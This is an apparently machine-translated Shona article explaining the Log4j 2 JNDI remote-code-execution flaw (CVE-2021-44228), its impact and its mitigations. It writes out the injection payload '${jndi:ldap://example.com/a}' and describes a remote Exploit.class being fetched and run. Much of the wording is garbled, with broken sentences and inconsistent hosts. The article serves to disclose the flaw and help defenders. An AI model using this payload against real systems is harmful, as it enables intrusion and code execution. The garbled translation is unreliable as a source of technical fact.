Munguva pfupi sakaburitsa nhau yekuti kusagadzikana kwakanyanya kwakaonekwa muApache Log4j 2, iyo inotaridzwa senzira yakakurumbira yekuronga registry mumaapplication eJava, ichibvumira kodhi isina kurongeka kuti iitwe kana kukosha kwakanyatso kunyorwa kunonyorerwa kurejista mufomati "{jndi: URL}".
Kunetseka Izvo zvinozivikanwa nekuti kurwiswa kunogona kuitwa muJava application izvoVanorekodha tsika dzakatorwa kubva kunze kwekunze, semuenzaniso nekuratidza zvinonetsa mameseji.
Zvinoonekwa kuti anenge ese mapurojekiti anoshandisa masisitimu seApache Struts, Apache Solr, Apache Druid kana Apache Flink anokanganisa, kusanganisira Steam, Apple iCloud, Minecraft vatengi uye maseva.
Kusagadzikana uku kunotarisirwa kutungamira mukurwiswa kukuru kwezvikumbiro zvebhizinesi, kudzokorora nhoroondo yekusagadzikana kwakanyanya muhurongwa, Apache Struts, inova fungidziro yakakasharara inoshandiswa mu65% yeFortune 100 web applications. zvinosanganisira zvakatorekodhwa kuedza kuongorora network kune masisitimu ari munjodzi.
Kusagadzikana kunobvumira kure kure kunoitwa kwekodhi isina kuvimbiswa. Log4j 2 ndeye yakavhurwa sosi Java log raibhurari yakagadziriswa neApache Foundation. Log4j 2 inoshandiswa zvakanyanya mumashandisirwo mazhinji uye iripo, sekutsamira, mumasevhisi mazhinji. Izvi zvinosanganisira bhizinesi kunyorera pamwe neakawanda masevhisi emakore.
Chikwata chekurwisa cheRandori chakagadzira hunyanzvi hwekushandisa uye chakakwanisa kubudirira kushandisa kusazvibata uku munzvimbo dzevatengi sechikamu chepuratifomu yedu inogumbura.
Kusagadzikana kunogona kuwanikwa kuburikidza nehuwandu hwekushandisa-chaiyo nzira. Chokwadi, chero mamiriro ezvinhu anobvumira chinongedzo chirikure kuti chipe data risingaite iro application inoshandisa Log4j raibhurari inonyora kurodha mafaera inobatwa zvisina kunaka. Kusagadzikana uku kunonyanya kushandiswa musango uye kunogona kukanganisa zviuru zvemasangano. Kusagadzikana uku kunomiririra njodzi yakakosha kune masisitimu akakanganisika.
Dambudziko rinowedzerwa nenyaya yekuti kushandiswa kwekushanda kwakatobudiswa, semuenzaniso.Asi zvigadziriso zvemapazi akagadzikana hazvisati zvagadzirwa. Iyo CVE identifier haisati yapihwa. Mhinduro yacho inongobatanidzwa mu log4j-2.15.0-rc1 test bazi. Sechishandiso chekuvharisa kusazvibata, zvinokurudzirwa kuseta Log4j2.formatMsgNoLookups parameter kuti ive chokwadi.
Dambudziko zvaive zvichikonzerwa nekuti Log4j 2 inotsigira kubata kwemasiki akakosha «{}» mumitsara yelogi., mairi JNDI mibvunzo inogona kumhanya (Java Naming uye Directory Interface).
Mukuongorora CVE-2021-44228, Randori akafunga zvinotevera:
Default kuisirwa kweanonyanya kushandiswa bhizinesi software kune panjodzi.
Kusagadzikana kunogona kushandiswa zvakavimbika uye pasina humbowo.
Kusagadzikana kunokanganisa akawanda mavhezheni eLog4j 2.
Kusagadzikana kunobvumira kure kure kodhi kuuraya kana mushandisi achimhanyisa application achishandisa raibhurari.
Kurwiswa kwacho kunosvika pakupfuudza tambo nekutsiva "$ {jndi: ldap: //example.com/a}", kugadzirisa iyo Log4j 2 inotumira chikumbiro cheLDAP chegwara rejava kirasi kune attacker.com server. . Nzira yakadzoserwa neserver yeanorwisa (semuenzaniso, http://example.com/Exploit.class) ichatakurwa nekuitwa mukati memamiriro ezvinhu aripo, zvichibvumira munhu anorwisa kuti awane kuurayiwa kwekodhi pane system ine kodzero. yekushandiswa kwazvino.
Chekupedzisira, zvinonzi izvo kana zvisizvo zvikawanikwa, zvinokurudzirwa kuti ufunge kuti ichi chiitiko chinoshanda, chave chakakanganiswa, uye pindura zvinoenderana. Kukwidziridza kune dzakapetwa vhezheni dzeLog4j 2 kana akakanganisika maapplication anobvisa kusagadzikana uku. Randori inokurudzira chero sangano raanofunga kuti rinogona kukanganiswa nekukasira kukwidziridza kune yakavharwa vhezheni.
Mune yazvino update kubva kuApache Log4j timu, kurudzira kuti masangano aite zvinotevera
- Gadziridza kuLog4j 2.15.0
- Kune avo vasingakwanise kukwidziridza kusvika ku2.15.0: Mushanduro> = 2.10, kusazvibata uku kunogona kudzikiswa nekuseta log4j2.formatMsgNoLookup system property kana LOG4J_FORMAT_MSG_NO_LOOKUPS nharaunda inoshanduka kuita chokwadi.
- Kune shanduro 2,0-beta9 kusvika 2.10.0, kuderedza ndiko kubvisa JndiLookup kirasi kubva mukirasi nzira: zip -q -d log4j-core - *.Jar org / apache / logging / log4j / core / lookup /JndiLookup.class.
mabviro: https://www.lunasec.io/